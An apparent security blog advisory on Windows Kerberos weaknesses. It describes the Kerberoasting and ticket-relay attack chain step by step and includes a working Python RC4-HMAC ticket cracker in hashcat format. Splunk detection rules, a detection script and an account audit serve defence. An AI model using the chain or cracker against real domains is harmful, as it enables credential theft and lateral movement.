Active Directory at Risk: New Windows Kerberos Weakness Enables Credential Theft and Lateral Movement

Product Details

Vendor: Microsoft
Product: Windows Active Directory – Kerberos / KDC (Key Distribution Center)
Affected Components:

  • Domain Controllers running Windows Server 2012 R2 (ESU), 2016, 2019, 2022, 2025
  • Kerberos authentication service (KDC)
  • Service account ticket issuance and encryption handling

Attack Surface: Internal network / domain environment
Authentication Required: Yes (low-privileged domain user or coerced authentication)
Primary Risk Areas:

  • Credential exposure
  • Lateral movement
  • Privilege escalation
  • Domain persistence

This vulnerability is particularly dangerous because it targets Kerberos, which is the backbone of authentication in almost every Windows enterprise environment.


CVE Overview – Basic Information Table

Field                      Details
Vulnerability Name         Windows Kerberos Weak Encryption & Trust Handling Vulnerability
CVE IDs                    CVE-2026-20833, CVE-2026-20849
CVSS Score                 CVE-2026-20833: ~5.5 (Medium) / CVE-2026-20849: ~7.5 (High)
Severity                   Medium to High (environment dependent)
Exploitability             Authenticated domain user or coerced authentication
Exploit Availability       Public research and proof-of-concept techniques exist (educational / testing use only)
Impact                     Credential theft, offline password cracking, Kerberos ticket abuse, privilege escalation
Persistence Risk           High (Kerberos tickets can be reused and forged if secrets are exposed)
Official Patch / Guidance  Microsoft Kerberos RC4 deprecation and KDC hardening update (link below)

Official Patch / Upgrade

Microsoft Official Guidance (Patch / Configuration Update):
https://support.microsoft.com/security/kerberos-rc4-kdc-guidance

This Microsoft guidance introduces audit and enforcement modes to phase out RC4 and strengthen Kerberos ticket security.
This is the authoritative and recommended remediation. Run audit mode first and review the events it produces for services that still negotiate RC4; switching an account to AES-only while its service cannot negotiate AES breaks that service, so fix those dependencies before moving to enforcement.


What Is the Vulnerability

This issue is not a single bug but a combination of weaknesses in how Kerberos handles encryption choices and trust decisions.

  1. Weak Encryption Handling (RC4)
    Some Windows environments still allow Kerberos service tickets to be issued with RC4-HMAC (etype 23). The encrypted part of such a ticket is keyed directly from the service account's NT hash, an unsalted MD4 of the password, so anyone holding the ticket can test candidate passwords offline at a cost of one MD4 and a few HMAC-MD5 operations per guess. AES tickets (etypes 17 and 18) derive their key with salted PBKDF2 over 4096 iterations, which makes each guess thousands of times more expensive. What gets recovered is the weak password; RC4 simply makes the search cheap enough to finish.
  2. Kerberos Trust and Input Handling
    A Windows client builds the service principal name for its ticket request from the canonical DNS name of the host it is connecting to. If an attacker can influence name resolution (for example by answering a query with a CNAME that points at a legitimate server while the connection itself is steered to the attacker), the client requests a ticket for the legitimate service and hands it to the attacker, who can relay it. Kerberos is only as trustworthy as the name resolution that feeds it.
  3. Real-World Impact
    When combined, these weaknesses allow attackers to:
    • Request Kerberos service tickets for high-value services
    • Capture those tickets
    • Crack them offline if weak encryption is used
    • Reuse recovered credentials for lateral movement or privilege escalation

This is especially dangerous in Active Directory environments with:

  • Legacy applications
  • Old service accounts
  • Poor Kerberos logging
  • Weak DNS controls

How This Vulnerability Can Be Exploited

This section is for defensive understanding only.

  1. Attacker gains any valid domain account (phishing, malware, reused password).
  2. Attacker enumerates service accounts and SPNs.
  3. Attacker requests service tickets for those SPNs (Kerberoasting). Any authenticated principal can do this; the KDC does not check whether the requester is authorized to use the service.
  4. If the target account still permits RC4 (msDS-SupportedEncryptionTypes unset, or with the 0x4 bit set), the attacker asks for etype 23 only and the KDC issues an RC4 ticket; the attacker extracts the ticket's encrypted part.
  5. The encrypted part is cracked offline (for example with hashcat mode 13100) to recover the service account password.
  6. Credentials are reused to:
    • Access servers
    • Move laterally
    • Escalate privileges
    • Potentially compromise the domain

In advanced cases, attackers manipulate DNS (for example CNAME answers served by a spoofed or attacker-controlled resolver) or coerce authentication from machines and services so that a victim requests a Kerberos ticket for a legitimate service and delivers it to the attacker, who relays it to that service. No password cracking is needed on that path: the relayed ticket is used as-is, within its lifetime.
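To show concretely why an RC4 service ticket can be cracked offline (weakness 1 above, and steps 4 and 5 of the chain), here is an added Python example; it is not code from the original post or from any Microsoft component. It implements the RC4-HMAC profile of RFC 4757 in pure Python, encrypts a stand-in ticket body under a constructed service account password, formats the result the way Kerberoasting tools hand it to hashcat (mode 13100), and recovers the password from the ticket alone. The account name, SPN, password and word list are all constructed for the example, and MD4 is implemented inline because hashlib does not expose it on every OpenSSL build.

```python
"""RC4-HMAC (etype 23) service ticket: issue it, then crack it offline.

Added example, not code from the original page. Pure-Python RFC 4757 so the
whole path (NT hash -> K1 -> checksum -> K3 -> RC4) is visible.
"""
import hmac
import os
import struct
from typing import Iterable, Optional

KU_TGS_REP_TICKET = 2  # key usage number for a ticket's enc-part (RFC 4120 s7.5.1)


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320). The NT hash is MD4 over the UTF-16LE password, no salt."""
    mask = 0xFFFFFFFF

    def f(x, y, z): return (x & y) | (~x & mask & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & mask

    bits = len(data) * 8
    data = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bits)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + g(b, c, d) + x[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4]), b, c
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 stream cipher (KSA + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: Optional[bytes] = None) -> bytes:
    """RFC 4757 s5: output is checksum || RC4(K3, confounder || plaintext)."""
    confounder = confounder or os.urandom(8)
    k1 = hmac.new(key, struct.pack("<I", usage), "md5").digest()
    data = confounder + plaintext
    checksum = hmac.new(k1, data, "md5").digest()
    k3 = hmac.new(k1, checksum, "md5").digest()
    return checksum + rc4(k3, data)


def rc4_hmac_decrypt(key: bytes, usage: int, blob: bytes) -> Optional[bytes]:
    """Plaintext, or None when the checksum fails (wrong key). This check is the cracking oracle."""
    checksum, ciphertext = blob[:16], blob[16:]
    k1 = hmac.new(key, struct.pack("<I", usage), "md5").digest()
    k3 = hmac.new(k1, checksum, "md5").digest()
    data = rc4(k3, ciphertext)
    if not hmac.compare_digest(hmac.new(k1, data, "md5").digest(), checksum):
        return None
    return data[8:]


def to_hashcat_13100(service_account: str, realm: str, spn: str, enc_part: bytes) -> str:
    """Kerberoast hash line in the hashcat -m 13100 / impacket GetUserSPNs layout."""
    return f"$krb5tgs$23$*{service_account}${realm}${spn}*${enc_part[:16].hex()}${enc_part[16:].hex()}"


def crack_rc4_ticket(enc_part: bytes, candidates: Iterable[str], usage: int = KU_TGS_REP_TICKET) -> Optional[str]:
    """Offline guess-and-check: no salt, no iteration count, one cheap trial per candidate."""
    for candidate in candidates:
        if rc4_hmac_decrypt(nt_hash(candidate), usage, enc_part) is not None:
            return candidate
    return None


# Constructed demo data (not from the page): a weak service-account password and a stand-in ticket body.
SERVICE_PASSWORD = "Summer2024!"
TICKET_BODY = b"EncTicketPart{cname=jdoe, crealm=CORP.LOCAL, key=..., authtime=...}"
WORDLIST = ["Password1", "Winter2023", "Summer2024!", "P@ssw0rd"]


def demo() -> Optional[str]:
    """Issue an RC4 ticket under the service key, print it hashcat-style, recover the password."""
    enc_part = rc4_hmac_encrypt(nt_hash(SERVICE_PASSWORD), KU_TGS_REP_TICKET, TICKET_BODY)
    print(to_hashcat_13100("svc-sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433", enc_part))
    return crack_rc4_ticket(enc_part, WORDLIST)


if __name__ == "__main__":
    print("recovered:", demo())
```

The point of the example is the decrypt routine: a wrong guess is rejected by the HMAC-MD5 checksum, a right guess is confirmed, and nothing in the ticket slows the loop down. Swap the RC4 path for AES and every trial would first have to pay for 4096 PBKDF2 iterations with the account's salt.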


MITRE ATT&CK Mapping

Primary Techniques

  • T1558 – Steal or Forge Kerberos Tickets
    • T1558.003 – Kerberoasting
    • T1558.001 – Golden Ticket (post-compromise)

Related Techniques and Tactics

  • T1550.003 – Pass the Ticket (reuse of captured or relayed tickets)
  • TA0006 – Credential Access
  • TA0008 – Lateral Movement
  • TA0004 – Privilege Escalation
  • TA0003 – Persistence (via ticket reuse)

Proof of Concept / Exploitation Availability

  • Public research and demonstration code exists showing:
    • Kerberos ticket extraction
    • DNS-based coercion of Kerberos authentication
    • Offline cracking of RC4-encrypted tickets
  • These techniques are widely understood and already used by attackers.
  • No zero-day exploit is required; this is abuse of existing behavior.

Defenders should assume active exploitation is feasible in unpatched or misconfigured environments.


Detection Strategy

Log Sources to Enable and Monitor

Log Source                         Why It Matters
Domain Controller Security Log     4768/4769/4771 are written only on the DC that handled the request, so collect from every DC, not a sample
Windows Security Log (Kerberos)    Ticket requests, encryption types and failure codes
DNS Server Logs                    Suspicious CNAME answers and unexpected dynamic record updates
Network Authentication Logs        Relay and abnormal authentication paths
SIEM (Splunk)                      Correlation and alerting

Critical Windows Event IDs

  • 4768 – TGT requested (subcategory: Audit Kerberos Authentication Service)
  • 4769 – Service ticket requested (MOST IMPORTANT; subcategory: Audit Kerberos Service Ticket Operations, which is not always enabled by default)
  • 4771 – Kerberos pre-authentication failed (Status 0x18 is a wrong password)

Splunk Detection Rules

Field names below assume the Security log is ingested in XML form (TargetUserName, ServiceName, IpAddress, TicketEncryptionType, Status). If your Windows add-on uses the classic text rendering, substitute Account_Name, Service_Name, Client_Address, Ticket_Encryption_Type and Failure_Code.

1. Detect RC4 / Weak Encryption Usage (High Priority)

Log Source: Windows Security Logs (Domain Controllers)

index=wineventlog EventCode=4769 TicketEncryptionType=0x17 Status=0x0
    ServiceName!="krbtgt" ServiceName!="*$"
| stats dc(ServiceName) AS distinct_spns, values(ServiceName) AS spns
    by TargetUserName, IpAddress
| where distinct_spns > 3

Why this matters:
Once service accounts have been moved to AES, an RC4 service ticket should be rare, and several RC4 tickets for different SPNs from one user in a short period is the classic Kerberoasting signature. Counting distinct SPNs rather than raw events is what separates a roast from a user reconnecting to one service. krbtgt and computer-account SPNs are excluded because they are noise for this rule, and failed requests are excluded because they never produce a crackable ticket. Baseline first: an account whose msDS-SupportedEncryptionTypes still permits RC4 produces 0x17 tickets legitimately.


2. Detect Excessive Service Ticket Requests (Kerberoasting Pattern)

Log Source: Windows Security Logs

index=wineventlog EventCode=4769 Status=0x0 ServiceName!="krbtgt" ServiceName!="*$"
| bin _time span=5m
| stats dc(ServiceName) AS distinct_spns by _time, TargetUserName, IpAddress
| where distinct_spns > 10

Why this matters:
Normal users rarely request tickets for many different services in a few minutes. This rule catches Kerberoasting of AES-only accounts too, where rule 1 is blind; the time bucket must come from bin, since stats does not accept span on its own.


3. Detect Suspicious Kerberos Failures (Pre-Auth Abuse)

Log Source: Windows Security Logs

index=wineventlog EventCode=4771
| bin _time span=10m
| stats count, dc(TargetUserName) AS distinct_users, values(Status) AS failure_codes
    by _time, IpAddress
| where count > 5

Why this matters:
Many failures for one user from one source indicate password guessing; a few failures each for many users from one source indicate password spraying. Status 0x18 (KDC_ERR_PREAUTH_FAILED) is the wrong-password code to key on.


4. Correlate DNS CNAME and Kerberos Requests

Log Sources: DNS Logs + Windows Security Logs

index=dns_logs record_type=CNAME
| join type=inner ClientAddress
    [ search index=wineventlog EventCode=4769
      | rename IpAddress AS ClientAddress
      | fields ClientAddress, TargetUserName, ServiceName ]
| stats count by ClientAddress, query, TargetUserName, ServiceName

Why this matters:
A client that receives a CNAME answer and shortly afterwards requests a ticket for the CNAME target is the pattern described above. The field names on the DNS side (ClientAddress, query, record_type) depend on your DNS log source and the 4769 side must be renamed to match, otherwise the join silently returns nothing. Two caveats: join is bounded by subsearch limits, so scope the time range, and this only sees queries that reached your own DNS servers; an attacker answering DNS on the local segment leaves no trace here, which is why the 4769 rules remain the primary signal.
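The following added Python example (not part of the original post, and not a Splunk component) runs the logic of rules 1 and 2 over a handful of constructed 4769 records so the thresholds and exclusions can be exercised offline: successful tickets only, krbtgt and computer-account SPNs ignored, 5-minute tumbling windows, then distinct RC4 SPNs per user and source IP (rule 1) and distinct SPNs of any encryption type (rule 2). Field names follow the XML rendering of Event ID 4769; the users, SPNs, addresses and timestamps are made up.

```python
"""Kerberoasting detection over 4769 records (rules 1 and 2 above, offline).

Added example, not code from the original page. Events are constructed and
use the XML field names of Event ID 4769.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"
RC4_SPN_THRESHOLD = 3      # rule 1: distinct RC4 service tickets per user+IP per window
BURST_SPN_THRESHOLD = 10   # rule 2: distinct service tickets of any etype per window


def ev(t, user, spn, ip, etype, status="0x0"):
    """One 4769 record with the fields the rules use."""
    return {"time": datetime.fromisoformat(t), "TargetUserName": user, "ServiceName": spn,
            "IpAddress": ip, "TicketEncryptionType": etype, "Status": status}


SAMPLE_4769 = [
    # jdoe pulls RC4 tickets for five different SPNs in two minutes (Kerberoasting)
    ev("2026-03-02T09:00:05", "jdoe@CORP.LOCAL", "svc-sql", "::ffff:10.0.0.45", "0x17"),
    ev("2026-03-02T09:00:06", "jdoe@CORP.LOCAL", "svc-web", "::ffff:10.0.0.45", "0x17"),
    ev("2026-03-02T09:00:07", "jdoe@CORP.LOCAL", "svc-backup", "::ffff:10.0.0.45", "0x17"),
    ev("2026-03-02T09:01:40", "jdoe@CORP.LOCAL", "svc-sap", "::ffff:10.0.0.45", "0x17"),
    ev("2026-03-02T09:01:59", "jdoe@CORP.LOCAL", "svc-print", "::ffff:10.0.0.45", "0x17"),
    # a failed request yields no usable ticket and is ignored
    ev("2026-03-02T09:02:00", "jdoe@CORP.LOCAL", "svc-hr", "::ffff:10.0.0.45", "0x17", "0x1b"),
    # normal user: one AES ticket for a user SPN, one for a host (computer-account SPN, excluded)
    ev("2026-03-02T09:01:00", "asmith@CORP.LOCAL", "svc-web", "::ffff:10.0.0.77", "0x12"),
    ev("2026-03-02T09:03:10", "asmith@CORP.LOCAL", "FS01$", "::ffff:10.0.0.77", "0x12"),
    # krbtgt tickets and machine-account requesters are noise for these rules
    ev("2026-03-02T09:03:30", "WS01$@CORP.LOCAL", "krbtgt", "::ffff:10.0.0.45", "0x12"),
] + [
    # asmith later requests AES tickets for eleven distinct SPNs within ten seconds (burst)
    ev(f"2026-03-02T09:10:{i:02d}", "asmith@CORP.LOCAL", f"svc-app{i:02d}", "::ffff:10.0.0.77", "0x12")
    for i in range(11)
]


def is_noise(e):
    """Mirror the SPL filters: success only, no krbtgt, no computer-account SPNs or requesters."""
    return (e["Status"] != "0x0"
            or e["ServiceName"].lower() == "krbtgt"
            or e["ServiceName"].endswith("$")
            or e["TargetUserName"].split("@")[0].endswith("$"))


def bucket(t, window_minutes=5):
    """Tumbling window start, the equivalent of `bin _time span=5m`."""
    return t.replace(second=0, microsecond=0) - timedelta(minutes=t.minute % window_minutes)


def detect_kerberoasting(events, window_minutes=5,
                         rc4_threshold=RC4_SPN_THRESHOLD, burst_threshold=BURST_SPN_THRESHOLD):
    """Alerts keyed like the SPL rules: one per (window, user, source IP) that crosses a threshold."""
    groups = defaultdict(list)
    for e in events:
        if not is_noise(e):
            groups[(bucket(e["time"], window_minutes), e["TargetUserName"], e["IpAddress"])].append(e)
    alerts = []
    for (start, user, ip), evs in sorted(groups.items()):
        spns = {e["ServiceName"] for e in evs}
        rc4_spns = sorted(e["ServiceName"] for e in evs if e["TicketEncryptionType"] == RC4_HMAC)
        base = {"window_start": start.isoformat(), "user": user, "source_ip": ip,
                "distinct_spns": len(spns), "rc4_spns": sorted(set(rc4_spns))}
        if len(set(rc4_spns)) > rc4_threshold:          # rule 1
            alerts.append({**base, "rule": "rc4_kerberoast"})
        if len(spns) > burst_threshold:                  # rule 2
            alerts.append({**base, "rule": "service_ticket_burst"})
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoasting(SAMPLE_4769):
        print(alert["rule"], alert["user"], alert["source_ip"], alert["distinct_spns"], alert["rc4_spns"])
```

Note how the two rules complement each other on the sample: jdoe trips only the RC4 rule (five SPNs, below the burst threshold), asmith trips only the burst rule (eleven AES tickets, no RC4), and the failed request, the host SPN and the machine account never reach the counters.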


Incident Response Guidance

  1. Identify affected service accounts immediately: every account with an SPN whose ticket could have been captured in the window, not only the one that was cracked.
  2. Reset service account passwords to long random values (25+ characters) or migrate the service to a group Managed Service Account; resetting to another guessable password only restarts the attacker's clock.
  3. Apply Microsoft Kerberos hardening guidance.
  4. Disable RC4 wherever possible, starting with the affected accounts (msDS-SupportedEncryptionTypes set to AES only).
  5. Investigate lateral movement from affected accounts: logons (4624) and service tickets (4769) sourced from the compromised account after the capture time.
  6. If domain compromise is suspected, reset krbtgt twice, waiting at least the maximum ticket lifetime (10 hours by default) between the two resets so existing tickets expire without breaking replication; the KDC still honours the previous krbtgt key after a single reset, so one reset does not invalidate forged tickets.

Why This Vulnerability Is Serious

This is not a flashy remote exploit.
This is worse.

It targets how trust works inside your domain.

If exploited successfully, attackers can:

  • Stay hidden
  • Move quietly
  • Reuse Kerberos tickets
  • Maintain long-term access

That is why the Microsoft guidance above pairs the update with audit and enforcement modes: the remediation is a configuration change that has to be rolled out deliberately, not just a patch to install.


Quick Action Checklist

  • Apply Microsoft Kerberos update and guidance (audit mode first, then enforcement)
  • Disable RC4 / weak Kerberos encryption; set msDS-SupportedEncryptionTypes to AES on service accounts
  • Monitor Event ID 4769 aggressively, and confirm the audit subcategory that produces it is enabled on every DC
  • Audit service accounts and SPNs: long random passwords or gMSAs, and no SPNs on privileged accounts
  • Harden DNS and authentication paths: restrict dynamic DNS updates, require SMB and LDAP signing and LDAP channel binding so relayed tickets have nowhere to land
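As an added example for the audit items on the checklist (not code from the original post), this Python triage takes the attributes an LDAP query or Get-ADUser would return for each account and reports which accounts with SPNs can still receive RC4 tickets, hold stale passwords, or are privileged. The msDS-SupportedEncryptionTypes bit values are the documented ones (MS-KILE); the account records are constructed, with pwdLastSet already converted from FILETIME to a datetime, and the one-year password-age threshold is a choice made for the example.

```python
"""Kerberoasting exposure triage over service-account attributes.

Added example, not code from the original page. Records mimic what an LDAP
query or Get-ADUser returns; the accounts below are constructed.
"""
from datetime import datetime, timedelta

# msDS-SupportedEncryptionTypes bit flags (MS-KILE section 2.2.7)
DES_CBC_CRC, DES_CBC_MD5, RC4_HMAC, AES128, AES256 = 0x1, 0x2, 0x4, 0x8, 0x10
ETYPE_NAMES = {DES_CBC_CRC: "DES-CBC-CRC", DES_CBC_MD5: "DES-CBC-MD5",
               RC4_HMAC: "RC4-HMAC", AES128: "AES128-CTS", AES256: "AES256-CTS"}
MAX_PASSWORD_AGE = timedelta(days=365)   # policy threshold chosen for the example


def decode_etypes(value):
    """Names of the etypes the KDC may use for this account's tickets."""
    if not value:   # attribute absent or 0: KDC defaults apply, and they still include RC4
        return ["RC4-HMAC (default, attribute unset)"]
    return [name for bit, name in ETYPE_NAMES.items() if value & bit]


def rc4_possible(value):
    return not value or bool(value & RC4_HMAC)


def assess(account, now):
    """Findings for one account; an empty list means it is not Kerberoastable."""
    findings = []
    if not account.get("servicePrincipalName"):
        return findings                                   # no SPN, no service ticket to request
    if "msDS-GroupManagedServiceAccount" in account.get("objectClass", []):
        return findings                                   # AD generates and rotates the password
    etypes = account.get("msDS-SupportedEncryptionTypes")
    if rc4_possible(etypes):
        findings.append("RC4 tickets possible (etypes: %s)" % ", ".join(decode_etypes(etypes)))
    age = now - account["pwdLastSet"]
    if age > MAX_PASSWORD_AGE:
        findings.append("password unchanged for %d days" % age.days)
    if account.get("adminCount") == 1:
        findings.append("privileged account (adminCount=1) exposes a service ticket")
    return findings


def audit(accounts, now):
    """sAMAccountName -> findings, for every account with at least one finding."""
    return {a["sAMAccountName"]: f for a in accounts if (f := assess(a, now))}


# Constructed sample accounts (not from the page).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc-sql", "objectClass": ["user"],
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"],
     "msDS-SupportedEncryptionTypes": None, "pwdLastSet": datetime(2019, 6, 1), "adminCount": 1},
    {"sAMAccountName": "svc-web", "objectClass": ["user"],
     "servicePrincipalName": ["HTTP/web01.corp.local"],
     "msDS-SupportedEncryptionTypes": AES128 | AES256, "pwdLastSet": datetime(2026, 1, 15)},
    {"sAMAccountName": "svc-legacy", "objectClass": ["user"],
     "servicePrincipalName": ["HOST/legacy01.corp.local"],
     "msDS-SupportedEncryptionTypes": RC4_HMAC | AES128 | AES256, "pwdLastSet": datetime(2025, 11, 1)},
    {"sAMAccountName": "gmsa-backup$", "objectClass": ["user", "msDS-GroupManagedServiceAccount"],
     "servicePrincipalName": ["HOST/backup01.corp.local"],
     "msDS-SupportedEncryptionTypes": AES256, "pwdLastSet": datetime(2026, 2, 20)},
    {"sAMAccountName": "jdoe", "objectClass": ["user"], "servicePrincipalName": [],
     "msDS-SupportedEncryptionTypes": None, "pwdLastSet": datetime(2020, 1, 1)},
]


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_ACCOUNTS, datetime(2026, 3, 2)).items():
        print(name)
        for finding in findings:
            print("  -", finding)
```

The account with an unset attribute is the one most audits miss: nothing says "RC4" on it, yet the KDC will issue RC4 tickets for it by default, which is why the check treats absence the same as the 0x4 bit.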

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.